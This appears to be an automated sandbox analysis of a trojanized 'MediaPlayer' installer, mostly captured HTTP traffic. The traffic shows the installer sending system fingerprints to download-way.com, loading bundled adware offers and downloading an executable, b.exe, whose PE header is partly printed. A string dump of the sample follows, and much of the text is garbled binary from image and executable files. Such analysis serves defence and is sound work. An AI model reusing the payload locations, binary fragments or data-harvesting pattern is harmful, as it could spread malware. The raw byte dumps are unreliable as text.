GIF89ae............pppC.K@.H>.H=.F=.D;.B7.>6.<4.9-.3-.2 ./*.-)./'. ...&.<>.Q..' ., .6&.26.C5.A,.7;.I<.G .*'.1'.0".*$.,,.43.<*.11.9/.8..76.?9.D5.=4.<:.C9.B9.A6.><.E:.B?.I>.G=.G;.C<.D@.I>.F@.I?.H>.GC.MB.LB.K@.IE.OK.RT.\..$..# .%!..)&..%. ".'&.-*.1!.&).1-.5)..&. -.5*.0'.,-.4*.0)..)./(.-'.-0.8,.2'.,)../.6-.4,.1 .1 .1)..0.7-.2,.23.;-.2*./3.9/.42.90.60.50.7..3..5-.24.;1.70.55.<4.;..48.?7.>6.=5.<4.:2.78.?6.=<.B:.A9.@8.?2.7-.3:.A8.?7.=;.B8.><.B<.C;.B;.@7.=@.H>.D>.D=.D:.A>.D:.?C.KC.IC.J8.=D.L?.F3.8?.F<.AE.JD.KF.LB.HA.FD.HN.TK.PP.TX.]a.fe.jn.rx.|~............................................$.('. %.)4.9).,).-*.. .-). .. .-*.--.10.41.5/.22.44.86.:C.HG.IH.L_.b.............................................'.(*.*(.)-../.0-.->.>C.E........................,. .&..................uuu...!.......,....e..........'......*\.........'.....f...i... C...i...Az...qZ.O"Ej...Z..0c....Z...4..8.....|.X.....P..X:5.U.U.j.....v3...Q.......].....p.....F...FM.R....1r..a........A.D.....NL........2...J.[T:p.....H.^....G...IQ..-Z{Z.&].....w....u.O<:<.....G..!pD......g...\.l\.q..'.......H..S...-....Q...lp)....D.......h......>...E..p...i@a!....D..0...\4..<i4..#..XH$...b .0...S.T.!8....<........8...G.f... .."K)S..M l.Q.,....>..RJ.9.QG.9..G..h...;6QP.p.)..t..G..h..?.X.'7V..J<....8....>.$A.>..R.?.."..p.!D ~..G...b...h.B....AA0........ .,......#...~ D<.."H ....,..B.<....8..r."....7.Xc...|.K(#(..................nD.D ....8.(aK>.............
<<< skipped >>>
GET /file/cmu9yf4p HTTP/1.1
Accept: */*
User-Agent: Setup Factory 9.0
Host: uploaded.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Found
Server: nginx
Date: Thu, 10 Dec 2015 04:50:07 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
Set-Cookie: PHPSESSID=d88cfbfbdb81d31ee23f60636b045023; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: hXXp://fra-7m22-stor05.uploaded.net/dl/a310a9a0-108b-44cf-bccd-26cb6eec3d08
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Thu, 10 Dec 2015 04:50:07 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..Set-Cookie: PHPSESSID=d88cfbfbdb81d31ee23f60636b045023; path=/..Expires: Thu, 19 Nov 1981 08:52:00 GMT..Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0..Pragma: no-cache..Location: hXXp://fra-7m22-stor05.uploaded.net/dl/a310a9a0-108b-44cf-bccd-26cb6eec3d08..Vary: Accept-Encoding..
GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel1.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 2881
Connection: keep-alive
Date: Thu, 10 Dec 2015 04:01:56 GMT
Content-Disposition: attachment; filename="cancel1.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:15 GMT
ETag: "d9f00c86bfa3e08e905128b131229fac"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2898
X-Cache: Hit from cloudfront
Via: 1.1 c013a1b33ae2677bcfa21234aa9a4276.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 1xu-Tb0eahQbBrnmv2Hya2cf2FTzY-CyT1tuh8TZs_gM8s6rEt2W-A==
GIF89ae......@.H*.-<.AC.K=.F>.H'. ;.B,./=.E)./)..@.I=.D=.D?.GC.M>.DC.IC.K'.,@.H>.F:.A*./D.LC.M?.HB.L=.G;.A9.@:.C .-;.CuuuB.K(.)>.G)..<.C). @.I>.E...>.G,. ). &. <.E*.&%.*6.C-.3-.33.7).1&.)www(.-*. .../.54.?-.4=.B...!.().0...-.7...G.I..9-.35.7?.F'.0A.O-..,.5<.B>.J ..D.I5.:..5=.GE.K/.0-.-/.2?.=,.7*. ;.B/.4 .'C.I..79.B&.2 .,<.>".*-.0?.C-.-8.>-.&'.12.4:.AC.B1.7-.4..$'. 3.8Q.\<.A<.G4.9 .05.<C.F6.;;.I@.I".%;.B>.Q*.-0.5&.<9.?'.-#.) .6:.A ./..31.57.>4.96.>0.76.<&.)2.78.?-.2-.3ppp..................................................................................................................................................................................................................................................................................................................!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:5653313B52CD11E48302D8AFAF09E831" xmpMM:DocumentID="xmp.did:5653313C52CD11E48302D8AFAF09E831"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:5653313952CD11E48302D8AFAF
<<< skipped >>>
GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/decline.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 1293
Connection: keep-alive
Date: Thu, 10 Dec 2015 04:01:58 GMT
Content-Disposition: attachment; filename="decline.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "137a96f0655570ffdf65ae14dad52404"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2896
X-Cache: Hit from cloudfront
Via: 1.1 c013a1b33ae2677bcfa21234aa9a4276.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 0kVL2SOnaBGzM82AJcrWkuDanxR0ra8f0cykqeuKfMoD75eZmEx2hQ==
GIF89ae......................................................................................................................................................................................................................................................................................................................................................................................................!.....t.,....e........ns.............n..mB.............FBm.s.C.............AB.DE.............DDI.GGF.............G.I.........(.....HJ.LML..........%....8...z.J.\..a.%N.5qB......8...F......H..F...$)..e.&P.A.I....37>......Ax..JT.N%D..\....)..H.J..U...H..u...[.... ..&/H.{!%.V.m...X0...)Se.......W.P!D.J.... ^.a@..T..(.........B.E....4.<Z4..-2..r....7L.....m*W.Y..........Nc...<.x..a.....Do..........;........{......_.>.. ..3(p....W._9p........{.........z... {[.....Vh...F0@..vX..Y.....D.E..v.!. f.".%j...#bh#._....[....@.)..@.1..[.....L2YD...I..C.X...H@..M2.D.`.....|...h....^.0@.pv.D..`...S.........o....z....7......9.!b.!...Vji. .... ....`<A'..f...T....=......:....0A.[$0@.>......{....a...&.....8@........a...&`...6.l.bP0....;n._. B...@.....l...a.......d......,....k......!h4....G....Wl.j..g....w.q.g.2..$.l..(....,....0..s.4..r......<....6.-t.?.m4.l.<G.o....PG-..TWM..M[...P....X...$d.m..g..@ .;....
<<< skipped >>>
GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/accept.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 3033
Connection: keep-alive
Date: Thu, 10 Dec 2015 04:01:58 GMT
Content-Disposition: attachment; filename="accept.gif"
Last-Modified: Thu, 26 Feb 2015 16:19:15 GMT
ETag: "3484f982bbd281ea323f9dedb47098ed"
Accept-Ranges: bytes
Server: AmazonS3
Age: 2896
X-Cache: Hit from cloudfront
Via: 1.1 c013a1b33ae2677bcfa21234aa9a4276.cloudfront.net (CloudFront)
X-Amz-Cf-Id: LanaVVYEVn3lXNi5MFBKdcam9x24x111oxFaOberXB-tFe7IvO33vQ==
GIF89ae...............!.(:.AhxjC.M..%...C.E...?.G...gvh*. *./*.3guhwww?.H<.E>.E&.) .->.G;.Appp.....3-.3,./-.2*.-=.E@.H<.A)..@.IC.K'. =.D8.?:.A7.>6.<2.74.91.50.76.>..................C.K...}..o.t ./...............'.,^.d......L.R~..uuu...............J.N...<.C...H.KL.P..................[._&. ...........................|.~......(.-...4.?k.oB.KG.M?.G...[.^;.C...|.....y.}...a.f......;.B...Y.^...j.m.........I.M......?.B>.D............M.Q...........9<.?... .5o.s1.8(.,A.K......C.I%.*..2?.Hgug).1E.Kn.o@.I-.4E.I>.F=.D6.;...'.)*.(*./-.-?.=-..:.C../<.C...5.<=.B?.C...9.@9.A:.A,.2;.B;.BQ.\...O.Tkyl/.3\._8.>'.-/.2>.F?.P<.F*.&-.34.9(.,@.I .....)./=.D3.8&.<C.K#.*C.J .,~.. .&...#.&(.) .2,.3=.F,.5(./...{.}...=.E&.*Y.\-.39.B{.|.........hwi). iyjjzk-.2^.b>.J&.,q.ul.pm.pn.q...M.R......<.A......!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:325014833434E411B829A1185F1C216E" xmpMM:DocumentID="xmp.did:D165859F343611E4B378E2150F88781F" xmpMM:InstanceID="xmp.iid:D165859E343611E4B378E2150F88781F" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:Deriv
<<< skipped >>>
GET /9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/left_image.png HTTP/1.1
Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn2.downloadsoup.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/png
Content-Length: 38013
Connection: keep-alive
Date: Wed, 09 Dec 2015 16:41:49 GMT
Content-Disposition: attachment; filename="left_image.png"
Last-Modified: Thu, 26 Feb 2015 16:19:16 GMT
ETag: "69024df30fda549f6ed20e0a65a7face"
Accept-Ranges: bytes
Server: AmazonS3
Age: 43706
X-Cache: Hit from cloudfront
Via: 1.1 c013a1b33ae2677bcfa21234aa9a4276.cloudfront.net (CloudFront)
X-Amz-Cf-Id: LBSU4KwL0l_MWmoVqRuvp8JV3C4H52Je9rOg2soOoU04syQnF7d68Q==
.PNG........IHDR.......e......89.....gAMA....7.......pHYs.......... ......tEXtSoftware.Adobe ImageReadyq.e<....IDATx^....l.U.v..........iF...Y.Vl....F.3..,.$.....8...@. .....l..A.6...I....d.1Y6..4...... #i.3.73..{.]..]U.....s......]..._.~........>{.........u&:...m...C.l.Ls.a6.[6L.{..8B...US1...~\}a.T....ye.....cx..U..u=c..l..B,...a.<(......./].b}!:9.Ee....N.........P~?..^.T...w.Y.......q.......Js......I..P.../...X........t.:.O.>M..q...fso.q3..6n$....].1.}}....,......4a}..i.q.]....p.D....w...$.CR.....(.v}.Q.;-8..#.v.........9W...>..0}...ar.%........T*..;n}..~...G_.h..z...h.S.5..ad;6..X.fO.>...L?..s......I.g)......e...g.,.N..F.P.d......L..b.....~..1,...PB.='.w...$....7.g67&.....U.m>..Z.1L....../...3....j.....b)k..v....8.{e.....D\..<..w...$..TV..U..1#VG:..F..a...FZ..:.\....J.|s..\1[....R...r.).T.7).g.|.>.o..1.p.7..!..TW...k...e..f. ./.O..k6Pfk....SH..G..,.....{.\......?....3.O....e.......c.2.?.w .)..r........,...qe`\_..[.a..i.TW.....=.L...yP\:.3q\......lX1.3.:....L.%...g.H?...6..|}....K([.E.SP..@...9....2..nn}..S~. *.......Fc..[..BE..V.....fq.Q..7.......}:d}...(...D.h(.U.:.e..iZ.././hP\:,.....-.|}.....}.-...<.@...*v......=..t ....|<.9<..0}.,a.t.B..z}.;..,.w..4..D2j\.&.bc...(V1!..,a...4......c....R5....M........66........j.,&...o...I...Vx..7...'...O...R[|s...........`...$:L....c-....Fh...Yo})..r.O.\.p......>..O.....x@K9H....a\...V...b{.{..J.....vk..0]7.)3..!.......!...D. ....7...6j.=..O..s..bZ.[6............k.p.7....FX.....q..Y..Q.l\:l...V..a.....<.}.y2.1..p*;.....Y..q'..{.
<<< skipped >>>
GET /V31/amipb.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.download-way.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn1.downloadsoup.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Length: 69260
Connection: keep-alive
Date: Thu, 10 Dec 2015 04:00:05 GMT
Last-Modified: Thu, 26 Nov 2015 15:03:49 GMT
ETag: "f96a7acecd2cfb0d4f3cfca235763504"
x-amz-storage-class: REDUCED_REDUNDANCY
Accept-Ranges: bytes
Server: AmazonS3
Age: 3009
X-Cache: Hit from cloudfront
Via: 1.1 8bed981585e2338012e4dd37a06b0cdb.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 76rLksTr2aHXgtjcgEIqqSLYx8FbPDNzqvKkh14XRZ4mmm5ypuNJNA==
..//<!-- ../* Progress bar */..var g_AmiPbs = new Array();..var g_AmiPbsEx = new Array();..var g_interval = 0;..var g_initComp = 0;..var g_possibleComps = [];..var g_reportedComps = [];..var g_removedComps = [];..var g_notCompatibleWithUpdaterComps = ['LootFindKP'];..var g_postponedComps = ['updater','SHAREit'];..var g_disable_updater = false;..function LogMessage(message) {.. try {.. g_ami.Log(message);.. }.. catch (excpt) {.. }..}..function IsDeclined(name) {.. var declined = 0;.. for (var i = 0; i < g_removedComps.length; i ) {.. if (g_removedComps[i] == name) {.. declined = 1;.. break;.. }.. }.. return declined;..}..function UpdateSkipStatus(sn) {.. if (g_testa && !ArrayContains(g_reportedComps, sn) && !ArrayContains(g_notest, sn) && !ArrayContains(g_notest1, sn)) {.. if (g_testa.constructor != Array || ArrayContains(g_testa, sn)) {.. g_ami.WriteProfileString(g_testf, '', sn, 'S');.. g_reportedComps.push(sn);.. }.. }..}..function ShortNameFromName(name) {.. for (c = 0; c < g_comps.length; c ) {.. if (g_comps[c].name == name) {.. return g_comps[c].sn;.. }.. }.. return name;..}..function UpdateComponentsStatus() {.. LogMessage('UpdateComponentsStatus function started');.. for (var j = 0; j < g_possibleComps.length; j ) {.. if (g_possibleComps[j].sn == 'updater') {.. continue;.. }.. if (g_possibleComps[j].sel !==
<<< skipped >>>
GET /cmu9yf4p HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Setup Factory 9.0
Host: ul.to
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Found
Server: nginx
Date: Thu, 10 Dec 2015 04:50:07 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
Location: hXXp://uploaded.net/file/cmu9yf4p
Vary: Accept-Encoding
HTTP/1.1 302 Found..Server: nginx..Date: Thu, 10 Dec 2015 04:50:07 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..Location: hXXp://uploaded.net/file/cmu9yf4p..Vary: Accept-Encoding..
POST /index.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.download-way.com
Content-Length: 448
Connection: Keep-Alive
Cache-Control: no-cache
Net1.1=&Net2=3.5.21022.08&Net4=4.0.30319&OSversion=NT5.1SP3&Slv=&Sysid=975F29BE8C8FD0BC5E8EBA2BBF1B629F&Sysid1=975F29BE8C8FD0BC5E8EBA2BBF1B629F&X64=N&admin=Y&browser=IEXPLORE.EXE&cavp=&chver=&cmdl=MediaPlayer__15159_il35679.exe&dprod=19C2FB3DEC385401F6FCF22178334A&exe=MediaPlayer__15159_il35679&ffver=&lang_DfltUser=0409&mac=AA==&machg=NzVlZDk1NjctYWE1OC00YzhlLWE4ZWEtM2NhZDdjNDdhYjAzAA==&name=WFAxMAA=&netfs=3&ts=1449723017&ver=1.1.5.55
HTTP/1.1 200 OK
Access-Control-Allow-Origin: hXXp://VVV.somauto.com
Content-Type: text/html; charset=UTF-8
Date: Thu, 10 Dec 2015 04:50:12 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
transfer-encoding: chunked
Connection: keep-alive
21f1.... .. ..<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.<html>. <head>. <meta http-equiv="content-type" content="text/html; charset=UTF-8" /> . <title>MediaPlayer</title>. <base href="http://VVV.download-way.com:80/index.php" />.<link rel="stylesheet" type="text/css" href="hXXp://cdn2.downloadsoup.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css" /> <script type="text/javascript" src="hXXp://cdn1.downloadsoup.com/V31/amipb.js"></script>. <script type="text/javascript">.var g_r__capp='MediaPlayer';.. var g_amiobj = '', g_ami, g_updb = false, g_close = '1', g_additional_offer_list = '1';. var g_finish_install_button = '1';. var g_popup_install_all = '1';. var g_eula = 'QnkgY2xpY2tpbmcgdGhlICJBY2NlcHQiIG9yICJOZXh0IiBidXR0b25zIGJlbG93LCBvciBieSBjb250aW51aW5nIHRoaXMgSW5zdGFsbFBhdGggSW5zdGFsbCBNYW5hZ2VyIGluc3RhbGxhdGlvbiwgb3Igb3RoZXJ3aXNlIHVzaW5nIHRoZSBTb2Z0d2FyZSwgeW91IGFncmVlIHRvIGJlIGJvdW5kIGJ5IHRoZSB0ZXJtcyBvZiBJbnN0YWxsUGF0aCBJbnN0YWxsIE1hbmFnZXIgaHR0cDovL3d3dy5pbnN0YWxscGF0aC5jb20vZXVsYS5odG1sIChFVUxBKSwgaXRzIGh0dHA6Ly93d3cuaW5zdGFsbHBhdGguY29tL3ByaXZhY3kuaHRtbCAoUHJpdmFjeSBQb2xpY3kpIGFuZCBodHRwOi8vd3d3Lmluc3RhbGxwYXRoLmNvbS90ZXJtcy5odG1sIChUZXJtcyBvZiBTZXJ2aWNlKS4gRm9yIGFueSBhZGRpdGlvbmFsIGluZm9ybWF0aW9uIG9uIEluc3RhbGxQYXRoIEluc3RhbGwgTWFuYWdlciB5b3UgY2FuIHZpc2l0IEluc3RhbGxQYXRoJ3Mgd2Vic2l0ZSBhdCBodHRwOi8vd3d3Lmluc3RhbGxwYXRoLmNvbS8
<<< skipped >>>
POST /finalize.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: hXXp://VVV.download-way.com/index.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.download-way.com
Content-Length: 381
Connection: Keep-Alive
Cache-Control: no-cache
_hdn=0&_ver=1.1.5.55&_p=1&_s=20&_cc=UA&_cid=15159&_psb=0&_cnt=77cf2e0adca2896b80870fc402dc2b9b&_instid=l35679&_brw=ie&_fc=216&_appname=&_appimageurl=&_netfs=-31&_vert=3&r_MediaPlayer=0&r_updater=0.01&r_NationZoom=1&r_OperaRUnew=2&r_AmigoIM=5&r_AnySend=1&r_OperaWW=2&r_PPSvideoPlayer=1&MediaPlayer=3&updater=2&NationZoom=1&OperaRUnew=1&AmigoIM=1&AnySend=1&OperaWW=1&PPSvideoPlayer=1
HTTP/1.1 200 OK
Content-Type: text/xml
Date: Thu, 10 Dec 2015 04:50:13 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 3285
Connection: keep-alive
....<Array><page><f>1</f><fb>9</fb><pt>0</pt><cats>0</cats><updh>1</updh><wrn></wrn><comps>MediaPlayer</comps><short_name>MediaPlayer</short_name><must_show>0</must_show><bdy>CiAgICAgICAgCjxkaXYgaWQ9ImFtaV9kaXNwbGF5X2JvZHkiPgoJPGRpdiBpZD0iYW1pX2xlZnRfaW1hZ2UiPgkKCQk8ZGl2IGlkPSJhbWlfbGVmdF9saW5rcyI CgkJCTxhIGhyZWY9Imh0dHA6Ly93d3cuaW5zdGFsbHBhdGguY29tL3ByaXZhY3kuaHRtbCAiIHRhcmdldD0iX2JsYW5rIiBzdHlsZT0iY29sb3I6IHdoaXRlIj5Qcml2YWN5IFBvbGljeTwvYT48YnIgLz4KCQkJPGEgaHJlZj0iaHR0cDovL3d3dy5pbnN0YWxscGF0aC5jb20vaW5kZXguaHRtbCIgdGFyZ2V0PSJfYmxhbmsiIHN0eWxlPSJjb2xvcjogd2hpdGUiPkhlbHA8L2E PGJyIC8 CgkJCTxhIGhyZWY9Imh0dHA6Ly93d3cuaW5zdGFsbHBhdGguY29tL2NvbnRhY3QtdXMuaHRtbCIgdGFyZ2V0PSJfYmxhbmsiIHN0eWxlPSJjb2xvcjogd2hpdGUiPkNvbnRhY3QgdXM8L2E CgkJPC9kaXY Cgk8L2Rpdj4KCTxkaXYgaWQ9ImFtaV9ib2R5X3RleHQiPgoJCTxkaXYgaWQ9ImFtaV9kZWNfZGl2Ij4JCgkJCTxzcGFuIGlkPSJhbWlfZGVjX3RpdGxlIj5XZWxjb21lIHRvIHRoZSBWTEMgTWVkaWEgUGxheWVyIFNldHVwIFdpemFyZDwvc3Bhbj4KCQkJPHAgaWQ9ImFtaV9kZWNfaW5mbyI CgkJCSAgRm9sbG93IHRoZSBvbi1zY3JlZW4gb3V0bGluZWQgdGhpcyB3aXphcmQgdG8gaW5zdGFsbCB0aGUgbmV3IHZlcnNpb24gb2YgVkxDIE1lZGlhIFBsYXllcgoJCQkgIGFuZCBiZW5lZml0IGZyb20gYWxsIHRoZSBsYXRlc3QgZmVhdHVyZXMgYW5kIHVwZGF0ZXMgVkxDIE1lZGlhIFBsYXllciBoYXMgdG8gb2ZmZXIuCgkJCTwvcD4KCQkgIDxzcGFuIGlkPSJhbWlfZGVjX25vdGUiPlBsZWFzZSB0byBjb250aW51ZSB3aXRoIHRoZSBpbnN0YWxsYXRpb24gc2VsZWN0IHlvdXIgZGVzaXJlZCBvcHRpb246PC9zcGFuPgoJCTwvZGl2PgoJCQkJCgkJPGRpdiBpZD0iZF9hbWlfTWVkaWF
<<< skipped >>>
GET /dl/a310a9a0-108b-44cf-bccd-26cb6eec3d08 HTTP/1.1
Accept: */*
Host: fra-7m22-stor05.uploaded.net
User-Agent: Setup Factory 9.0
Cookie: PHPSESSID=d88cfbfbdb81d31ee23f60636b045023
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Dec 2015 04:50:07 GMT
Content-Type: application/octet-stream
Content-Length: 2861977
Last-Modified: Wed, 09 Dec 2015 20:37:36 GMT
Connection: keep-alive
Content-Disposition: attachment; filename="b.exe"
ETag: "56689110-2bab99"
Accept-Ranges: bytes
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........2...\...\...\..'....\..'....\.......\...]...\..'....\..'....\..'....\.Rich..\.........PE..L...,-.T.................X...........).......p....@..........................P......J6....@.................................<...d........n...................0..........................................@............p..x............................text....W.......X.................. ..`.rdata.......p...0...\..............@..@.data...h...........................@....rsrc....n.......p..................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................U...X......... .@.3..E.SVW.}.3.h....S....@...dq@.P..hq@........`........V......SP.......Pp@....W..;.}.W......P...p@.3.h..........WP..............9=..@.......3.F...@..4.......P...p@......./ub......<Tt"<Wt.<tt.<wuL......P.....u>.......6......P.....~(......:u....~....P......P......P........j.h.q@.j.......PVj....p@....u..5..@.G;=..@...O.................F...1w........u.j.h.q@.......Pj...lq@........u....M._..^3.[.........V..W3.h..........WP...q@...0.....8.....<.....@.....D....A..............H
<<< skipped >>>
GET /down/kabo/apps.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Setup Factory 9.0
Host: bumpacpacba.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
X-Powered-By: PHP/5.4.45
Content-Type: text/html
Content-Length: 32
Date: Thu, 10 Dec 2015 04:50:04 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: close
EDkh679oKhVnvEc2tJ4F2hCvvh3Af0tl..
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
MediaPlayer__15159_il35679.exe_1884:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
109 9 59
109 9 59
17 85 54 84 79 51 17 115
17 85 54 84 79 51 17 115
19 89 52 85 120 58 58 67 63
19 89 52 85 120 58 58 67 63
18 116 19 2 9 120 49 92 54
18 116 19 2 9 120 49 92 54
18 121 28
18 121 28
18 85 46 117 120
18 85 46 117 120
18 85 46 97 82 46 48 92
18 85 46 97 82 46 48 92
25 95 59 85 114 53 58 94 27
25 95 59 85 114 53 58 94 27
25 95 59 85 114 53 58 94 13
25 95 59 85 114 53 58 94 13
59 68 62 93 87 120 49 92 54
59 68 62 93 87 120 49 92 54
59 67 54 94 84 61 32 64
59 67 54 94 84 61 32 64
58 92 63 2 9 120 49 92 54
58 92 63 2 9 120 49 92 54
7 85 59 85 125 63 57 85
7 85 59 85 125 63 57 85
7 85 54 84 90 37 48 116 25
7 85 54 84 90 37 48 116 25
38 66 44
38 66 44
0 99 31 99 8 100 123 84 54 93
0 99 31 99 8 100 123 84 54 93
2 66 51 69 94 16 60 92 63
2 66 51 69 94 16 60 92 63
34 66 49 66 79
34 66 49 66 79
GetProcessWindowStation
GetProcessWindowStation
operator
operator
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
ole32.dll
ole32.dll
RegCloseKey
RegCloseKey
RegOpenKeyW
RegOpenKeyW
ADVAPI32.dll
ADVAPI32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
0NÙ2n:
0NÙ2n:
~S%uga
~S%uga
{.OC]]
{.OC]]
5q.DW
5q.DW
9N%uE
9N%uE
~S%ua
~S%ua
3.kj=
3.kj=
s'.kC
s'.kC
#^.BA
#^.BA
}`.GQ
}`.GQ
~BL
~BL
.AweI
.AweI
bNzg .Gf?
bNzg .Gf?
%9sfkh,A
%9sfkh,A
%9sfkh,_
%9sfkh,_
U.ji'
U.ji'
%ssP{
%ssP{
%SI8{n
%SI8{n
yp{.nf
yp{.nf
K.kXhgw?j6ww
K.kXhgw?j6ww
0>.Aq
0>.Aq
.GQ
.GQ
C%uv(R
C%uv(R
l.OC0
l.OC0
II.sf
II.sf
Q_.zhA
Q_.zhA
%Sx\h
%Sx\h
E%x$M
E%x$M
F%xlN
F%xlN
%UeAW
%UeAW
.GVTL(
.GVTL(
7Z.Es&X
7Z.Es&X
G.Se(
G.Se(
.kbE D~*Z$
.kbE D~*Z$
RM%Cq
RM%Cq
..HaM
..HaM
%X%hbM
%X%hbM
.CQ}k
.CQ}k
e^/%d&
e^/%d&
~0.ad$
~0.ad$
}~2^4_
}~2^4_
%UuL*
%UuL*
.hp%(
.hp%(
-mSQl
-mSQl
type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />
type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />
103 60 97
103 60 97
109 37 20
109 37 20
112 59 96
112 59 96
116 44 119 94 116 115 98
116 44 119 94 116 115 98
26 1 94 107 93 86 73 23
26 1 94 107 93 86 73 23
116 12 87 126 116 83 66
116 12 87 126 116 83 66
119 52 113 94
